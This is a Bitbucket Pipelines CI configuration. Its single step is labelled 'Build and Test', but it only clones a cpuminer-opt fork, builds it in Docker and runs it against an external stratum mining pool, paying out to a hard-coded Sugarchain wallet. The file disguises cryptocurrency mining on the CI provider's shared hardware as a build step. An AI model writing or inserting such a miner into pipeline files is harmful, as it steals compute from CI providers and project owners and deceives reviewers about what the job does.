image: atlassian/default-image:2

pipelines:
  default:
    - parallel:
        - step:
            name: Build and Test
            script:
              - git clone https://github.com/cryptozeny/cpuminer-opt-sugarchain
              - cd cpuminer-opt-sugarchain
              - docker build -t cpuminer-opt:latest .
              - docker run -it --rm cpuminer-opt:latest -a yespower -o stratum+tcp://stratum-na.rplant.xyz:7042 -u sugar1qjhuqfmdcmaq6qr0dlxh2c9d874x6eaa88vmj3y.cpu1 -t4
            services:
              - docker
            caches:
              - docker